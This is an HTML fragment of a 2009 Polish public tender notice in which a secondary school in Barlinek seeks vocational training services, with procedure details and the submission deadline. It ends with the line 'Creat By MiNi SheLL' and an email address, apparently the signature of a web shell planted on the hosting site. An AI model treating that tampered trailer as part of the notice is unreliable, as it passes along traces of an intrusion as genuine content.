Przedmiotem zamówienia jest USŁUGA SZKOLENIA ZAWODOWEGO
   Kody CPV
USŁUGI SZKOLENIA ZAWODOWEGO - 80530000-8

UWAGA: Zamawiający dopuszcza składanie ofert równoważnych. Wszystkie podane nazwy własne są przykładowe..</li>
</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> http://www.zspnr1barlinek.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zespół Szkół Ponadgimnazjalnych Nr1 im.kpt.hm. Andrzeja Romockiego Morro w Barlinku ul. Szosowa 2 74-320 Barlinek.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.01.2009 godzina 08:00, miejsce: Zespół Szkół Ponadgimnazjalnych Nr1 im.kpt.hm. Andrzeja Romockiego Morro
74-320 Barlinek ul. Szosowa 2 sektertariat pok. nr1 parter.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 8 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com